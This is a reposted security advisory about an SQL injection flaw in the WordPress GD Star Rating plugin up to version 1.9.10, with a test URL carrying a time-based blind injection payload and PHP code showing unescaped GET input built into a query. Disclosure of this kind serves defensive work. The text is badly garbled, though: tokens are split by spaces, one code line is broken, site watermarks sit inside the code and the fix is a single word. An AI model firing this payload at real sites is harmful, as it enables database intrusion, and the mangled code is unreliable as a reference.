WordPress agent GD Star Rating & lt; = 1.9.10 SQL Injection defects and repair

 

Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability

Author: Miroslav Stampar (miroslav. stampar (at) gmail.com www.2cto.com @ stamparm)

: Http://downloads.wordpress.org/plugin/gd-star-rating.zip

Tested version: 1.9.10

Tip: magic_quotes has to be turned off

 

---

Test

---

Http://www.bkjia.com/wp-content/plugins/gd-star-rating/export. php? Ex = user & us = dummy & de =-1 'AND 1 = IF (2> 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0) -- % 20

 

---------------

Code Analysis

---------------

./Export. php

Require_once ("./code/cls/export. php ");

...

If (isset ($ _ GET ["ex"]) {

$ Export_type = $ _ GET ["ex"];

...

Switch ($ export_type ){

Case "user ":

Header ('content-type: text/csv ');

Header ('content-Disposition: attachment; filename = "gdsr_export_'.w.export_name.'.csv "');

$ SQL = GDSRExport: export_users ($ _ GET ["us"], $ _ GET ["de"], $ get_data );

$ Rows = $ wpdb-> get_results ($ SQL, ARRAY_N );

 

./Code/cls/export. php

Class GDSRExport {www.2cto.com

...

Function export_users ($ user_data = "min", $ data_export = "article", $ get_data = array ()){

...

$ Where = array ();

...

$ Where [] = "v. vote_type = '". $ data_export ."'";

...

$ J_where = join ("and", $ where );

...

Return sprintf ("select % s from % s where % s order by u. id ",

$ J_select, $ j_tables, $ j_where );

Fix: Filter